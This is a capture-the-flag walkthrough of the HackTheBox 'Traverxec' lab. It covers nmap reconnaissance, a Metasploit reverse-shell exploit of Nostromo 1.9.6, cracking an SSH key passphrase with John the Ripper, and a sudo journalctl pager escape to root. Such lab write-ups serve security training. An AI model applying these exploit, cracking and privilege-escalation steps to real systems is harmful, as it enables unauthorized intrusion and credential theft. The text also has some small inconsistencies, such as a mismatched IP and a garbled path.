Today we’re going to solve another boot2root challenge called “Traverxec“. It’s available at HacktheBox for penetration testing practice. This laboratory is of an easy level, but with adequate basic knowledge to break the laboratories and if we pay attention to all the details we find during its examination, it will not be complicated. Let’s get started and learn how to break it down successfully.

Level: Easy

Penetration Testing Methodology

Reconnaissance

• Nmap

Exploitation

• SSH Login
• Enumerating for user flag

Privilege Escalation

• Abusing journalctl

Walkthrough

Reconnaissance

Let’s start with nmap which is used for port scanning. It shows two ports open, SSH (TCP 22) and HTTP (TCP 80). From the given image below, we can observe that we found ports 22 and 80 are open. This means the services like ssh and http are running in the victim’s network. Anyway, there’s another interesting information on the nmap result that gives us information about the name of the used web server and its version: nostromo 1.9.6.

nmap -sV 10.129.1.193

We will be needing to start enumeration against the host machine. Since port 80 is open I look toward browser and explore target ip 192.168.1.104 and found nothing useful.

Exploitation

To exploit we will be using the Metasploit Framework. We found a module, this module exploits a remote command execution vulnerability in Nostromo <= 1.9.6. This issue is caused by a directory traversal in the function “http_verify” in nostromo nhttpd allowing an attacker to achieve remote code execution via a crafted HTTP request.

After running msfconsole its time to load the module with help of use command. Then we have to provide required to inform such Rhost (Target IP) Lhost (Attacker IP)

use exploit/multi/http/nostromo_code_exec
set rhosts 10.129.1.193
set lhost 10.10.14.52
exploit

All set and we are ready to pop the shell. This gave us a meterpreter shell in no time .and move to /var directory to list out all the directories present inside it. The conf directory in /var/nostromo is displayed as shown in the screenshot.

sessions -u 1
sessions 2

Now our next job is to enumerate the target machine and we found /var folder which gives us a directory named “nostromo”. And we found a configuration file.

cd /var
ls
cd nostromo
ls

Let’s dive inside the directory named “conf” and while enumerating the file system we found two other files with .conf extension. Now we will use the cat command to view the content present inside .htpasswd file. We found a user named “David” and a hash. Further, we gain uses cat command to view file named nhttpd.conf. Also, we found home directory along with home directory public_www

cd conf
ls
cat .htpasswd
cat nhttpd.conf

Now let’s dive inside the home directory of David. Then list out the directory contents using ls command. And we found a directory named protected-file-area seems eye-catching!!!!.

cd /home/david/public_www
ls

Let’s dive inside a directory named protected-file-area and look at the content of protected-file-area using the ls command. Let’s download backup-ssh-identify-files.tgz in our kali terminal using download command.

cd protected-file-area
ls
download backup-ssh-identify-files.tgz

I unzip the above backup file using tar command. And we found ssh login key. Next job in our hand is to give executable permission to the key we found by using chmod.

tar xzvf backup-ssh-identify-files.tgz
cd home/david/.ssh
ls
chmod 600 id_rsa

Let’s try to access the target using the command given below:

ssh -i id_rsa david@10.129.1.193

It’s asking to enter the passphrase for key id_rsa!!!!!!!

We will use ssh2john to convert the key. Next, we will use JohnTheRipper to get the password in clear text using rockyou wordlist

locate ssh2john
/usr/share/john/ssh2john.py id_rsa > sshhash

john --wordlist=/usr/share/wordlists/rockyou.txt sshash

Yeah!!!! The password is a hunter

Privilege Escalation

Now try to access the target and use the passphrase for key id_rsa as hunter

We have our login credentials, so we tried to access the SSH on the target system and we were successfully able to login as David.

ssh -i id_rsa david@10.129.1.193

After logging in we found our first flag user.txt

cat user.txt

Now let’s escalate permissions to grab our root flag. Let’s explore bin directory and use the cat command to view the content under server-stats.sh and looking at the contents of the script we can see that it’s running journalctl command as root.

cd bin
ls
cat server-stats.sh

I run the command mentioned in the script.

/usr/bin/sudo /usr/binjournalctl -n5 -unostromo.service

then ran the !/bin/bash command to escalate root privileges. and obtain the root shell and finished the challenge by capturing the root flag.

cd /root
ls
cat root.txt

Author: Shambhavi Pandey is a Cyber Security Enthusiast who is keen in gaining practical knowledge in the field of cybersecurity. Contact here